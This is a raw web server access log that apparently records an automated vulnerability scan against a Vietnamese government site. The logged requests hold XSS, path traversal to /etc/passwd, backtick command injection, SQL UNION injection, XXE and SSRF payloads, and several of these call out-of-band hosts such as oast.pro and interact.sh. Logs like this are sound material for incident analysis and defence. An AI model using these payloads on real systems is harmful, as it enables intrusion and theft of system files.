1 391 2023-11-09 20:24:34 103.153.214.94 GET /plus/pass_reset.php L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 368 2023-11-09 20:25:14 103.153.214.94 GET /wp-admin/admin.php page=download_report&report=users&status=all 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 365 2023-11-09 20:26:47 103.153.214.94 GET / search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search&nearby=off&address_lat&address_lng&distance=10&lcats%5B%5D 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 371 2023-11-09 20:27:10 103.153.214.94 POST /dashboard/uploadID.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 363 2023-11-09 20:27:48 103.153.214.94 GET /query db=db&q=SHOW%20DATABASES 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 364 2023-11-09 20:28:22 103.153.214.94 GET /xmlpserver/servlet/adfresource format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 368 2023-11-09 20:28:25 103.153.214.94 GET /data/autosuggest-remote.php q="><img%20src=x%20onerror=alert(1)> 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 363 2023-11-09 20:28:28 103.153.214.94 GET /admin/data/autosuggest-remote.php q="><img%20src=x%20onerror=alert(1)> 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 301 0 0 406 2023-11-09 20:28:41 103.153.214.94 POST /xmlpserver/ReportTemplateService.xls - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 370 2023-11-09 20:28:48 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 398 2023-11-09 20:29:49 103.153.214.94 POST /pandora_console/index.php login=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 1481 2023-11-09 20:29:49 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/WebReferences 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 366 2023-11-09 20:29:51 103.153.214.94 POST /pandora_console/index.php sec=netf&sec2=operation/netflow/nf_live_view&pure=0 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 362 2023-11-09 20:29:55 103.153.214.94 GET /cs/Satellite pagename=OpenMarket/Xcelerate/Admin/Slots 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 364 2023-11-09 20:30:49 103.153.214.94 GET /xmlpserver/convert xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//cl6fbhsfe7k9sg331pog5qpc34fjhzk8z.oast.pro/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 367 2023-11-09 20:32:14 103.153.214.94 POST /rest/tinymce/1/macro/preview - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 bcvt.kontum.gov.vn 405 0 1 363 2023-11-09 20:32:32 103.153.214.94 GET /secure/ManageFilters.jspa filter=popular&filterView=popular 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 1114 2023-11-09 20:33:12 103.153.214.94 GET /secure/ConfigurePortalPages!default.jspa view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 403 2023-11-09 20:33:15 103.153.214.94 GET /rest/api/2/user/picker query 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 367 2023-11-09 20:33:37 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 368 2023-11-09 20:33:47 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 6518 2023-11-09 20:33:50 103.153.214.94 GET /__r2/query-printRows.view schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 363 2023-11-09 20:33:50 103.153.214.94 GET /labkey/__r1/login-login.view returnUrl=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 366 2023-11-09 20:33:52 103.153.214.94 GET /test/pathtraversal/master/..%2f..%2f..%2f..%2f../etc/passwd - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 0 0 373 2023-11-09 20:34:46 103.153.214.94 POST /cgi-bin/file_transfer.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 1850 2023-11-09 20:35:58 103.153.214.94 GET /sell-media-search/ keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 364 2023-11-09 20:36:05 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 406 0 0 366 2023-11-09 20:36:37 103.153.214.94 POST /wls-wsat/CoordinatorPortType - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 1696 2023-11-09 20:36:39 103.153.214.94 POST /_async/AsyncResponseService - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 360 2023-11-09 20:36:44 103.153.214.94 GET /_async/favicon.ico - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 398 2023-11-09 20:37:02 103.153.214.94 POST /node/1 _format=hal_json 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 361 2023-11-09 20:37:05 103.153.214.94 PUT /wp-content/plugins/w3-total-cache/pub/sns.php - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 2305 2023-11-09 20:37:33 103.153.214.94 POST /adxmlrpc.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 1435 2023-11-09 20:37:39 103.153.214.94 GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php 0=id 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 366 2023-11-09 20:38:58 103.153.214.94 POST /photo/p/api/album.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 372 2023-11-09 20:39:30 103.153.214.94 GET /webapp/ fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 401 2023-11-09 20:40:26 103.153.214.94 POST /service/extdirect - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 1525 2023-11-09 20:41:03 103.153.214.94 GET /badging/badge_template_v0.php layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 367 2023-11-09 20:41:48 103.153.214.94 GET /updating.jsp url=https://interact.sh/ 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 402 2023-11-09 20:42:25 103.153.214.94 GET /objects/getImage.php base64Url=YGlkID4gbGZoZXUudHh0YA===&format=png 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 365 2023-11-09 20:42:29 103.153.214.94 GET /objects/getImageMP4.php base64Url=YGlkID4gbGZoZXUudHh0YA===&format=jpg 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 401 2023-11-09 20:42:29 103.153.214.94 POST /api/timelion/run - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 2104 2023-11-09 20:43:22 103.153.214.94 GET /index.php/login - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 367 2023-11-09 20:58:46 103.153.214.94 GET /objects/getSpiritsFromVideo.php base64Url=YGlkID4gbGZoZXUudHh0YA===&format=jpg 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 366 2023-11-09 20:58:51 103.153.214.94 GET /objects/lfheu.txt - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 372 2023-11-09 20:59:07 103.153.214.94 POST /cgi-bin/supportInstaller - 443 - 101.35.195.134 MSIE - 405 0 1 362 2023-11-09 20:59:38 103.153.214.94 GET / c=../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 369 2023-11-09 20:59:46 103.153.214.94 GET /badging/badge_print_v0.php tpl=../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 364 2023-11-09 20:59:47 103.153.214.94 GET /card_scan.php No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20bALMDsvMAM.txt%60 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 362 2023-11-09 20:59:51 103.153.214.94 GET /bALMDsvMAM.txt - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 1043 2023-11-09 21:00:40 103.153.214.94 POST /rest/issueNav/1/issueTable - 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 394 2023-11-09 21:00:42 103.153.214.94 POST /kindeditor/php/demo.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 362 2023-11-09 21:00:42 103.153.214.94 GET /rest/api/latest/groupuserpicker query=1&maxResults=50000&showAvatar=true 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 365 2023-11-09 21:00:48 103.153.214.94 POST /plugins/servlet/gadgets/makeRequest - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 360 2023-11-09 21:00:48 103.153.214.94 POST /php/demo.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 362 2023-11-09 21:01:24 103.153.214.94 GET /hoteldruid/visualizza_tabelle.php anno=2019&id_sessione&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 386 2023-11-09 21:01:24 103.153.214.94 POST /content/2XwZKKh9GA7C9yxTEe9FUbAlobe - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 364 2023-11-09 21:01:28 103.153.214.94 POST /content/2XwZKKh9GA7C9yxTEe9FUbAlobe.af.internalsubmit.json - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 363 2023-11-09 21:02:02 103.153.214.94 GET /wavemaker/studioService.download method=getContent&inUrl=file///etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 371 2023-11-09 21:02:41 103.153.214.94 GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 371 2023-11-09 21:03:42 103.153.214.94 POST /search/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 364 2023-11-09 21:03:45 103.153.214.94 POST /search/ - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 362 2023-11-09 21:03:45 103.153.214.94 GET /s/2XwZLJFeqnN0dXjH4AWfQK51CGZ/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 363 2023-11-09 21:03:47 103.153.214.94 GET /index.php pma_servername=cl6fbhsfe7k9sg331pogbs64jjgwhyzim.oast.pro&pma_username=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&pma_password=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&server=1 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 361 2023-11-09 21:03:47 103.153.214.94 GET /s/2XwZLJFeqnN0dXjH4AWfQK51CGZ/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 362 2023-11-09 21:03:50 103.153.214.94 GET /pma/index.php pma_servername=cl6fbhsfe7k9sg331pogrkcwsaxhnsc1k.oast.pro&pma_username=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&pma_password=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&server=1 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 402 2023-11-09 21:03:53 103.153.214.94 GET /pmd/index.php pma_servername=cl6fbhsfe7k9sg331pog49h8ircetzo89.oast.pro&pma_username=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&pma_password=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&server=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 373 2023-11-09 21:03:57 103.153.214.94 GET /phpMyAdmin/index.php pma_servername=cl6fbhsfe7k9sg331pogh9iw1ephff4z7.oast.pro&pma_username=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&pma_password=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&server=1 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 365 2023-11-09 21:04:03 103.153.214.94 GET /phpmyadmin/index.php pma_servername=cl6fbhsfe7k9sg331pogxiwbekigbbd9d.oast.pro&pma_username=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&pma_password=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&server=1 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 391 2023-11-09 21:04:05 103.153.214.94 GET /_phpmyadmin/index.php pma_servername=cl6fbhsfe7k9sg331pog35ijaskso5em9.oast.pro&pma_username=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&pma_password=2XwZLGxzO3aeS0p0xbc1RRmUH1Z&server=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 399 2023-11-09 21:04:59 103.153.214.94 POST /Autodiscover/Autodiscover.xml - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 363 2023-11-09 21:05:44 103.153.214.94 POST /artifactory/ui/auth/login _spring_security_remember_me=false 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn/artifactory/webapp/ 405 0 1 1414 2023-11-09 21:07:13 103.153.214.94 GET / mp_idx=%22;alert(%271%27);// 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 367 2023-11-09 21:07:23 103.153.214.94 GET /index.php/component/jemessenger/box_details task=download&dw_file=../../.././../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 403 2023-11-09 21:07:46 103.153.214.94 GET /ReportServer/Pages/ReportViewer.aspx - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 363 2023-11-09 21:08:03 103.153.214.94 GET /wp-admin/admin-post.php swp_debug=load_options&swp_url=http://cl6fbhsfe7k9sg331pogomefijwxmsqxh.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 362 2023-11-09 21:09:56 103.153.214.94 GET /commands.inc.php searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('999999999'),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 364 2023-11-09 21:10:01 103.153.214.94 GET /compliancepolicies.inc.php search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 365 2023-11-09 21:10:05 103.153.214.94 GET /compliancepolicyelements.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 362 2023-11-09 21:10:12 103.153.214.94 GET /devices.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 368 2023-11-09 21:10:36 103.153.214.94 GET /snippets.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 410 2023-11-09 21:10:41 103.153.214.94 GET /auth/realms/master/protocol/openid-connect/auth scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://cl6fbhsfe7k9sg331pog3a3hnqq8dwz3b.oast.pro/ 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 362 2023-11-09 21:11:08 103.153.214.94 GET /backupsettings.dat - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 364 2023-11-09 21:11:50 103.153.214.94 GET /web.config.i18n.ashx l=ufiiw&v=ufiiw 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 363 2023-11-09 21:11:53 103.153.214.94 GET /SWNetPerfMon.db.i18n.ashx l=ufiiw&v=ufiiw 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 387 2023-11-09 21:12:18 103.153.214.94 POST /service/rapture/session - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 366 2023-11-09 21:12:21 103.153.214.94 POST /service/rest/beta/repositories/bower/group - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 366 2023-11-09 21:14:01 103.153.214.94 POST /api/snapshots - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vn 404 0 2 2653 2023-11-09 21:14:35 103.153.214.94 GET /MicroStrategyWS/happyaxis.jsp 